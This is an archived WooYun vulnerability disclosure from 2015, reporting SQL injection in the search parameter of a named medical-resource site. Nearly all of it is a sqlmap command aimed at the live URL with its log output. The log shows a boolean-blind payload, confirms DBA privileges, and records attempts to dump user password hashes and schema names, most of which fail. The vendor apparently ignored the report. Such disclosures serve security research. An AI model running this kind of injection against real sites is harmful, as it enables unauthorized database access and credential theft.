乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-24: 细节已通知厂商并且等待厂商处理中 2015-05-29: 厂商已经主动忽略漏洞,细节向公众公开
rt
[root@Hacker~]# Sqlmap Sqlmap -u "http://ziyuan.iiyi.com/source/search?kw=临床诊疗指南" --dbs --passwords --current-user --current-db --is-db sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to o[*] starting at 19:58:35[19:58:35] [INFO] resuming back-end DBMS 'oracle'[19:58:35] [INFO] testing connection to the target URL[19:58:35] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhasqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: kw Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: kw=??????' AND 2191=2191 AND 'arWK'='arWK---[19:58:35] [INFO] the back-end DBMS is Oracleweb application technology: Nginx, PHP 5.3.8back-end DBMS: Oracle[19:58:35] [INFO] fetching current user[19:58:35] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[19:58:35] [INFO] retrieved:[19:58:35] [INFO] heuristics detected web page charset 'utf-8'[19:58:36] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'current user: None[19:58:36] [INFO] fetching current database[19:58:36] [INFO] retrieved:[19:58:37] [WARNING] reflective value(s) found and filtering out[20:00:38] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSescurrent schema (equivalent to database on Oracle): None[20:00:38] [INFO] testing if current user is DBAcurrent user is DBA: True[20:00:38] [INFO] fetching database users password hashes[20:00:38] [INFO] fetching database users[20:00:38] [INFO] fetching number of database users[20:00:39] [INFO] retrieved:[20:00:42] [CRITICAL] unable to retrieve the number of database users[20:00:42] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes[20:00:42] [INFO] fetching database (schema) names[20:00:42] [INFO] fetching number of databases[20:00:42] [INFO] retrieved:[20:00:46] [ERROR] unable to retrieve the number of databases[20:00:46] [INFO] falling back to current database[20:00:46] [INFO] fetching current database[20:00:46] [INFO] retrieved:[20:01:38] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[20:03:05] [CRITICAL] unable to retrieve the database names[20:03:05] [WARNING] HTTP error codes detected during run:404 (Not Found) - 7 times
危害等级:无影响厂商忽略
忽略时间:2015-05-29 08:12
漏洞Rank:15 (WooYun评价)
暂无